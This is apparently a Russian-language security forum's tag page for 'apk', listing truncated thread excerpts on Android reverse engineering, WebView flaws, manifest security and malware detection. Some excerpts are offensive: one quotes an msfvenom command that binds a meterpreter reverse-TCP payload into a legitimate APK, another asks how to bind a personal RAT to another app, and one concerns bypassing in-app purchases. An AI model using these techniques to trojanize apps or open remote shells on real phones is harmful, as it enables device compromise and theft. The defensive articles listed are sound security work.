apk

  1. cr1pt0n

    Проблема msfvenom и apk

    Здравствуйте ребята. Создал пэйлоад для андроида с помощью msfvenom(склеил пейлоад к другому apk). msfvenom -x original.apk -p android/meterpeter/reverset_tcp LHOST=ip LPORT=ip -o apk Но при установке приложение никаких разрешений не спрашивает. То есть у него вообще нету привилегий. Разобрал...
  2. Zer0must2b

    Гостевая статья Уязвимости Android WebView

    WebViews используются в приложениях для Android для загрузки содержимого и HTML-страниц в приложении. Благодаря этой функциональности реализация WebView должна быть безопасной, чтобы не вводить приложение с большим риском. Цель этой статьи - изучить вещи, которые сделают WebView менее...
  3. Zer0must2b

    Гостевая статья Reverse Engineering Android-приложений

    Тесты на проникновение в мобильные приложения выходят за рамки стандартного обнаружения уязвимостей через Burp Suite. Крайне важно знать, как декомпилировать приложение для проверки уязвимостей в коде приложения. Целью этой статьи является демонстрация различных методов и инструментов для...
  4. Zer0must2b

    Гостевая статья Получение APK-файлов

    Первым шагом в каждой оценке безопасности Android является наличие файла .APK, который является фактическим приложением. В большинстве случаев клиент несет ответственность за предоставление этого файла, особенно в ситуации, когда фактическое приложение не является общедоступным. Однако если по...
  5. Zer0must2b

    Гостевая статья Правила безопасности для файлов манифеста Android

    Файлы манифеста играют важную роль для каждого приложения для Android. В этом файле разработчик Android определяет разрешения, которые требуются приложению, действия, которые может выполнять приложение, и общие другие действия. С точки зрения безопасности, файл манифеста, как правило, является...
  6. Zer0must2b

    Гостевая статья Внедрение полезных нагрузок Metasploit в приложения для Android

    Можно использовать легитимное приложение Android в качестве трояна, чтобы использовать фактическое устройство пользователя. Причины того, почему этот тест важен при каждой оценке безопасности Android, заключается в том, что он позволит тестеру определить, существуют ли определенные защиты вокруг...
  7. Zer0must2b

    Гостевая статья Внедрение полезных нагрузок Metasploit в приложения для Android - вручную

    Большинству приложений Android не хватает достаточной защиты вокруг двоичного файла, и поэтому злоумышленник может легко троянизировать легитимное приложение с вредоносными нагрузками. Это одна из причин того, что мобильное вредоносное ПО так быстро распространяется в телефонах Android. При...
  8. IWI

    Разработка приложений.

    Здравствуйте, ищу разработчика приложений apk, может есть на форуме такие ребята. Хотелось бы сделать vpn на мобильные устройства и много ещё различных приложений. Может у вас есть знакомые которые занимаются разработкой мобильных приложений. Напишите мне в лс или посоветуйте кого нибудь...
  9. antvel

    Проблема adb Как При установке приложений на xiaomi каждый раз не спрашивать подтверждение

    Добрый день! Сейчас есть небольшой bash скрипт adb который автоматически устанавливает пулл приложений, 5 apk на смартфоны, с самсунгами все отлично, но xiaomi для каждого приложения спрашивает "установить приложение по usb или нет?" (больше того, еще стоит таймер, если за 30 секунд не...
  10. antvel

    Проблема Авто установка приложений в android

    Добрый день! Есть задача, реализовать авто установку apk (около 10 - ти штук) на android от 5 версии по интернету без root прав. Перелопатил много статей, понимаю что это на уровне невозможного (или по крайней мере мне так кажется из за не знания). Возможно вы сможете что то подсказать? Пока...
  11. Zer0must2b

    Проблема apk fatrat - как подписан установленный пейлоад apk в android системе?

    а как подписан установленый пейлоад apk в android системе,имею ввиду com.android и тд. может кто знает?
  12. K

    Решено Как поставить цифровую подпись на apk

    Как поставить подпись на apk?
  13. A

    Статья Взлом покупки в приложении или Я не хочу платить пару долларов

    Дисклеймер Данная статья впервые была опубликована мною 27 ноября 2014 года в песочнице habrahabr.ru, но удалена модераторами в тот же день. Спустя 4 года я нашёл исходники статьи и публикую её практически без изменений. И я не стал убирать скриншоты под спойлеры, потому что на них изображён...
  14. W

    Заплачу Ищу реверсера Java (JVM)

    Нужно разобрать apk файл Задача: понять протокол общения с сервером (сокеты или веб сокеты скорее всего), определить шифрование и фрагментацию, структуру пакетов, в декомпилированном коде следует найти механизмы детектирования ботов Связь - телега @webstep
  15. U

    Проблема Joiner for apk android / Джойнер для склейки апк приложения

    Приветсвую! Есть свое rat-apk приложение. Нужно связать с другим приложением. Посоветуйте плз рабочие решения. PS> встроенные apk joiner'ы от fatrat'a и ahmyth'a не подходят. С меня лойс, заранее спасибо
  16. Dr.Lafa

    Статья Декомпиляция android-приложений

    Понадобилось мне зареверсить одно приложение и подумал, почему бы статью об этом не написать? При реверсинге может возникнуть 2 случая: 1. Простой: У вас на руках есть .apk файл приложения. Можно приступать к реверсу. 2. Сложный: Приложение есть только в googleplay. Прийдётся выковыривать...
  17. Vander

    Статья Mobile Security Framework - Выявление вредоносного кода в приложениях

    Приветствую! В этой статье речь пойдет о фреймворке, который позволяет провести анализ мобильных приложений на наличие вредоносного кода. Mobile Security Framework (MobSF) – представляет собой интеллектуальную платформу с открытым исходным кодом, для тестирования мобильных приложений (Android...
  18. <~DarkNode~>

    Статья Лаборатория тестирования на проникновение «Test lab v.10» — за гранью хакерских возможностей (6)

    Глава 6 Предыдущая глава Следующая глава Оглавление Привет колеги. Сегодня возьмем с вами ssh-test(172.16.0.1) машину Берется он довольно быстро,как только мы получили доступ к ssh машине(172.16.0.8) Взять его можно двумя способами.Сначала я попытаюсь попытаюсь рассказать о более простом...
  19. Vander

    Статья Mara Framework. Reverse engineering APK

    Привет! В этой публикации я покажу фреймворк, который позволит проводить реверс-инжиниринг APK файлов. Называется он MARA Framework. Изменения в этой версии. Обновление происходит с помощью setup.sh. · Анализ домена · Сканирование Domain SLL с помощью pyssltest и testssl ·...
  20. Vander

    Статья Lobotomy - APK Reverse Ingineering Tool

    Приветствую всех! На днях мне попался еще один инструмент для проведения reverse-ingineering’a .apk файлов, и я хочу Вас с ним познакомить. Утилита носит название Lobotomy. Все, что о ней необходимо знать, можно поместить в короткий список, ниже: · Компоненты: Перечисление компонентов...